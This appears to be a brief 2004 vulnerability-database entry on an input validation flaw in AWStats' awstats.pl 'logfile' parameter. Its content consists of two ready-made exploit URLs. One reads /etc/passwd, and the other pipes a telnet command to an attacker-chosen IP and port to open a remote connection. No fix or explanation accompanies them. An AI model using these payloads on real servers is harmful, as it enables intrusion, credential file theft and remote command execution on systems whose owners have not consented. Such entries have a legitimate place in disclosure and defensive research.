AWStats Input Validation Hole in 'logfile'
2004-08-21 00:00:00Example:
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

